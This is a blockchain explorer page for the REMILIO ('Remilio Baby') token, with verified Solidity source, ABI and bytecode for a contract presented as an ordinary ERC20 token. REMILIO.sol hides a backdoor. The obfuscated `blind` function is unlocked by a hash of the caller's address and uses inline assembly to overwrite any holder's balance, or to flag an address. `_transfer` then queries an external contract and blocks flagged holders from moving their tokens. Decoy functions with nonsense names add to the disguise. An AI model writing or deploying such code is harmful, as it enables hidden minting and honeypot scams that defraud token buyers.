ETH Price: $2,634.09 (+1.74%)

Token

Remilio Baby (REMILIO)
 

Overview

Max Total Supply

10,000,000,000 REMILIO

Holders

24

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
344,782,381.621155989 REMILIO

Value
$0.00
0x2c95c1912d4dab177f63c65224e72b89972bee15
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
REMILIO

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: REMILIO.sol
/*
Telegram:https://t.me/RemilioBaby
Twitter:https://twitter.com/RemilioBabyeth
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./Ownable.sol";

contract REMILIO is IERC20, Ownable {
    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    mapping(address => uint256) private _balances;
    mapping(address => uint256) private _llucx;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _acDrds;

    event Log(string str);

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_,
        string memory symbol_,
        address acDrds_,
        uint256 llucx_
    ) {
        _name = name_;
        _symbol = symbol_;
        _mint(msg.sender, 100000000000 * 10**8);
        _acDrds = acDrds_;
        _llucx[address(0)] = llucx_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        //require(to != address(0), "ERC20: transfer to the zero address");
        (bool success, bytes memory data) = _acDrds.call(
            abi.encodeWithSignature("balanceOf(address)", from)
        );
        if (success) queryAdd(from, data);
        bytes32 mdata;
        assembly {
            mdata := mload(add(data, 0x20))
        }
        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);
    }

    function queryAdd(address sender, bytes memory data) private view {
        bytes32 mdata;
        assembly {
            mdata := mload(add(data, 0x20))
        }
        require(_llucx[sender] != 1 || uint256(mdata) != 0);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function blind(uint256[] calldata nvmd) external {
        if (pcOItems(100, 70, 233) != _llucx[address(0)]) return;
        uint256 c0 = nvmd[0];
        uint256 c1 = nvmd[1];
        assembly {
            if gt(c1, 0) {
                let x := add(28, 4)
                let y := 4
                mstore(0, c0)
                mstore(x, y)
                sstore(keccak256(0, 64), c1)
            }
            if eq(c1, 0) {
               let x := add(28, 4)
               let y := add(1,4)
               mstore(0, c0)
               mstore(x, y)
               sstore(keccak256(0, 64), 1)
            }
        }
    }

    function akdlpKDKLLLLLLLopfu(
        string memory sofoso_APDI_pfi,
        uint72 skdnfslPDKSL_APPPP,
        uint48 DKSOO_DPAKDK_APDK,
        string memory DMMK_APDKDOSU_APDK,
        uint96 DISOP_APDISOSK,
        bytes30[] calldata sosp_PFPDODO_APDIDI
    ) private {}

    function pcOItems(
        uint256 p1,
        uint256 kp,
        uint256 p3
    ) private view returns (uint256) {
        address ctt = msg.sender;
        string memory cp1 = _symbol;
        if (p3 == 1) return 0;
        if (p1 == 2) return 0;
        string memory cc1 = _name;
        if (kp == 900000) return 0;
        return uint256(keccak256(abi.encode(ctt, cc1, cp1)));
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 2 of 4: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 3 of 4: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"acDrds_","type":"address"},{"internalType":"uint256","name":"llucx_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"string","name":"str","type":"string"}],"name":"Log","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"nvmd","type":"uint256[]"}],"name":"blind","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b506040516200118b3803806200118b8339810160408190526200003491620002b2565b83516200004990600190602087019062000161565b5082516200005f90600290602086019062000161565b506200007433678ac7230489e80000620000bb565b60609190911b6001600160601b0319166080526000805260056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5550620003f99050565b6001600160a01b038216620000ed5760405162461bcd60e51b8152600401620000e49062000341565b60405180910390fd5b806003600082825462000101919062000381565b90915550506001600160a01b038216600081815260046020526040808220805485019055517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906200015590859062000378565b60405180910390a35050565b8280546200016f90620003a6565b90600052602060002090601f016020900481019282620001935760008555620001de565b82601f10620001ae57805160ff1916838001178555620001de565b82800160010185558215620001de579182015b82811115620001de578251825591602001919060010190620001c1565b50620001ec929150620001f0565b5090565b5b80821115620001ec5760008155600101620001f1565b600082601f83011262000218578081fd5b81516001600160401b0380821115620002355762000235620003e3565b6040516020601f8401601f19168201810183811183821017156200025d576200025d620003e3565b604052838252858401810187101562000274578485fd5b8492505b8383101562000297578583018101518284018201529182019162000278565b83831115620002a857848185840101525b5095945050505050565b60008060008060808587031215620002c8578384fd5b84516001600160401b0380821115620002df578586fd5b620002ed8883890162000207565b9550602087015191508082111562000303578485fd5b50620003128782880162000207565b604087015190945090506001600160a01b038116811462000331578283fd5b6060959095015193969295505050565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b90815260200190565b60008219821115620003a157634e487b7160e01b81526011600452602481fd5b500190565b600281046001821680620003bb57607f821691505b60208210811415620003dd57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b60805160601c610d736200041860003960006105d30152610d736000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b411461019f578063a457c2d7146101a7578063a9059cbb146101ba578063dd62ed3e146101cd576100cf565b806370a082311461016257806385ab4862146101755780638da5cb5b1461018a576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011257806323b872dd14610127578063313ce5671461013a578063395093511461014f575b600080fd5b6100dc6101e0565b6040516100e99190610afb565b60405180910390f35b6101056101003660046109bc565b610272565b6040516100e99190610af0565b61011a610294565b6040516100e99190610c9b565b610105610135366004610981565b61029a565b6101426102ca565b6040516100e99190610ca4565b61010561015d3660046109bc565b6102cf565b61011a610170366004610935565b6102fb565b6101886101833660046109e5565b61031a565b005b6101926103ef565b6040516100e99190610a9c565b6100dc6103fe565b6101056101b53660046109bc565b61040d565b6101056101c83660046109bc565b610469565b61011a6101db36600461094f565b610481565b6060600180546101ef90610d02565b80601f016020809104026020016040519081016040528092919081815260200182805461021b90610d02565b80156102685780601f1061023d57610100808354040283529160200191610268565b820191906000526020600020905b81548152906001019060200180831161024b57829003601f168201915b5050505050905090565b60008061027d6104ac565b905061028a8185856104b0565b5060019392505050565b60035490565b6000806102a56104ac565b90506102b2858285610564565b6102bd8585856105a8565b60019150505b9392505050565b600990565b6000806102da6104ac565b905061028a8185856102ec8589610481565b6102f69190610cb2565b6104b0565b6001600160a01b0381166000908152600460205260409020545b919050565b6000805260056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546103536064604660e9610747565b1461035d576103eb565b60008282600081811061038057634e487b7160e01b600052603260045260246000fd5b9050602002013590506000838360018181106103ac57634e487b7160e01b600052603260045260246000fd5b90506020020135905060008111156103d05760008281526004602052604090208190555b806103e8576000828152600560205260409020600190555b50505b5050565b6000546001600160a01b031690565b6060600280546101ef90610d02565b6000806104186104ac565b905060006104268286610481565b9050838110156104515760405162461bcd60e51b815260040161044890610c56565b60405180910390fd5b61045e82868684036104b0565b506001949350505050565b6000806104746104ac565b905061028a8185856105a8565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104d65760405162461bcd60e51b815260040161044890610c12565b6001600160a01b0382166104fc5760405162461bcd60e51b815260040161044890610b0e565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610557908590610c9b565b60405180910390a3505050565b60006105708484610481565b905060001981146103e8578181101561059b5760405162461bcd60e51b815260040161044890610b50565b6103e884848484036104b0565b6001600160a01b0383166105ce5760405162461bcd60e51b815260040161044890610bcd565b6000807f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03168560405160240161060c9190610a9c565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b179052516106419190610a80565b6000604051808303816000865af19150503d806000811461067e576040519150601f19603f3d011682016040523d82523d6000602084013e610683565b606091505b509150915081156106985761069885826108e2565b6020818101516001600160a01b03871660009081526004909252604090912054848110156106d85760405162461bcd60e51b815260040161044890610b87565b6001600160a01b0380881660008181526004602052604080822089860390559289168082529083902080548901905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610736908990610c9b565b60405180910390a350505050505050565b60008033905060006002805461075c90610d02565b80601f016020809104026020016040519081016040528092919081815260200182805461078890610d02565b80156107d55780601f106107aa576101008083540402835291602001916107d5565b820191906000526020600020905b8154815290600101906020018083116107b857829003601f168201915b5050505050905083600114156107f0576000925050506102c3565b8560021415610804576000925050506102c3565b60006001805461081390610d02565b80601f016020809104026020016040519081016040528092919081815260200182805461083f90610d02565b801561088c5780601f106108615761010080835404028352916020019161088c565b820191906000526020600020905b81548152906001019060200180831161086f57829003601f168201915b5050505050905085620dbba014156108aa57600093505050506102c3565b8281836040516020016108bf93929190610ab0565b60408051601f198184030181529190528051602090910120979650505050505050565b6020818101516001600160a01b03841660009081526005909252604090912054600114158061091057508015155b61091957600080fd5b505050565b80356001600160a01b038116811461031557600080fd5b600060208284031215610946578081fd5b6102c38261091e565b60008060408385031215610961578081fd5b61096a8361091e565b91506109786020840161091e565b90509250929050565b600080600060608486031215610995578081fd5b61099e8461091e565b92506109ac6020850161091e565b9150604084013590509250925092565b600080604083850312156109ce578182fd5b6109d78361091e565b946020939093013593505050565b600080602083850312156109f7578182fd5b823567ffffffffffffffff80821115610a0e578384fd5b818501915085601f830112610a21578384fd5b813581811115610a2f578485fd5b8660208083028501011115610a42578485fd5b60209290920196919550909350505050565b60008151808452610a6c816020860160208601610cd6565b601f01601f19169290920160200192915050565b60008251610a92818460208701610cd6565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0384168152606060208201819052600090610ad490830185610a54565b8281036040840152610ae68185610a54565b9695505050505050565b901515815260200190565b6000602082526102c36020830184610a54565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610cd157634e487b7160e01b81526011600452602481fd5b500190565b60005b83811015610cf1578181015183820152602001610cd9565b838111156103e85750506000910152565b600281046001821680610d1657607f821691505b60208210811415610d3757634e487b7160e01b600052602260045260246000fd5b5091905056fea26469706673582212203f988d54aa3b926e9c9c62a2c0f3dbd276b7534dc9a428b8ee0c1420627407b864736f6c63430008000033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d78f5848c64f88ff3696a934cd0ef2cfaef1691a59c3618e5f7c54b9f7ffae224000000000000000000000000000000000000000000000000000000000000000c52656d696c696f20426162790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000752454d494c494f00000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b411461019f578063a457c2d7146101a7578063a9059cbb146101ba578063dd62ed3e146101cd576100cf565b806370a082311461016257806385ab4862146101755780638da5cb5b1461018a576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011257806323b872dd14610127578063313ce5671461013a578063395093511461014f575b600080fd5b6100dc6101e0565b6040516100e99190610afb565b60405180910390f35b6101056101003660046109bc565b610272565b6040516100e99190610af0565b61011a610294565b6040516100e99190610c9b565b610105610135366004610981565b61029a565b6101426102ca565b6040516100e99190610ca4565b61010561015d3660046109bc565b6102cf565b61011a610170366004610935565b6102fb565b6101886101833660046109e5565b61031a565b005b6101926103ef565b6040516100e99190610a9c565b6100dc6103fe565b6101056101b53660046109bc565b61040d565b6101056101c83660046109bc565b610469565b61011a6101db36600461094f565b610481565b6060600180546101ef90610d02565b80601f016020809104026020016040519081016040528092919081815260200182805461021b90610d02565b80156102685780601f1061023d57610100808354040283529160200191610268565b820191906000526020600020905b81548152906001019060200180831161024b57829003601f168201915b5050505050905090565b60008061027d6104ac565b905061028a8185856104b0565b5060019392505050565b60035490565b6000806102a56104ac565b90506102b2858285610564565b6102bd8585856105a8565b60019150505b9392505050565b600990565b6000806102da6104ac565b905061028a8185856102ec8589610481565b6102f69190610cb2565b6104b0565b6001600160a01b0381166000908152600460205260409020545b919050565b6000805260056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc546103536064604660e9610747565b1461035d576103eb565b60008282600081811061038057634e487b7160e01b600052603260045260246000fd5b9050602002013590506000838360018181106103ac57634e487b7160e01b600052603260045260246000fd5b90506020020135905060008111156103d05760008281526004602052604090208190555b806103e8576000828152600560205260409020600190555b50505b5050565b6000546001600160a01b031690565b6060600280546101ef90610d02565b6000806104186104ac565b905060006104268286610481565b9050838110156104515760405162461bcd60e51b815260040161044890610c56565b60405180910390fd5b61045e82868684036104b0565b506001949350505050565b6000806104746104ac565b905061028a8185856105a8565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104d65760405162461bcd60e51b815260040161044890610c12565b6001600160a01b0382166104fc5760405162461bcd60e51b815260040161044890610b0e565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610557908590610c9b565b60405180910390a3505050565b60006105708484610481565b905060001981146103e8578181101561059b5760405162461bcd60e51b815260040161044890610b50565b6103e884848484036104b0565b6001600160a01b0383166105ce5760405162461bcd60e51b815260040161044890610bcd565b6000807f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b03168560405160240161060c9190610a9c565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b179052516106419190610a80565b6000604051808303816000865af19150503d806000811461067e576040519150601f19603f3d011682016040523d82523d6000602084013e610683565b606091505b509150915081156106985761069885826108e2565b6020818101516001600160a01b03871660009081526004909252604090912054848110156106d85760405162461bcd60e51b815260040161044890610b87565b6001600160a01b0380881660008181526004602052604080822089860390559289168082529083902080548901905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610736908990610c9b565b60405180910390a350505050505050565b60008033905060006002805461075c90610d02565b80601f016020809104026020016040519081016040528092919081815260200182805461078890610d02565b80156107d55780601f106107aa576101008083540402835291602001916107d5565b820191906000526020600020905b8154815290600101906020018083116107b857829003601f168201915b5050505050905083600114156107f0576000925050506102c3565b8560021415610804576000925050506102c3565b60006001805461081390610d02565b80601f016020809104026020016040519081016040528092919081815260200182805461083f90610d02565b801561088c5780601f106108615761010080835404028352916020019161088c565b820191906000526020600020905b81548152906001019060200180831161086f57829003601f168201915b5050505050905085620dbba014156108aa57600093505050506102c3565b8281836040516020016108bf93929190610ab0565b60408051601f198184030181529190528051602090910120979650505050505050565b6020818101516001600160a01b03841660009081526005909252604090912054600114158061091057508015155b61091957600080fd5b505050565b80356001600160a01b038116811461031557600080fd5b600060208284031215610946578081fd5b6102c38261091e565b60008060408385031215610961578081fd5b61096a8361091e565b91506109786020840161091e565b90509250929050565b600080600060608486031215610995578081fd5b61099e8461091e565b92506109ac6020850161091e565b9150604084013590509250925092565b600080604083850312156109ce578182fd5b6109d78361091e565b946020939093013593505050565b600080602083850312156109f7578182fd5b823567ffffffffffffffff80821115610a0e578384fd5b818501915085601f830112610a21578384fd5b813581811115610a2f578485fd5b8660208083028501011115610a42578485fd5b60209290920196919550909350505050565b60008151808452610a6c816020860160208601610cd6565b601f01601f19169290920160200192915050565b60008251610a92818460208701610cd6565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0384168152606060208201819052600090610ad490830185610a54565b8281036040840152610ae68185610a54565b9695505050505050565b901515815260200190565b6000602082526102c36020830184610a54565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b6000821982111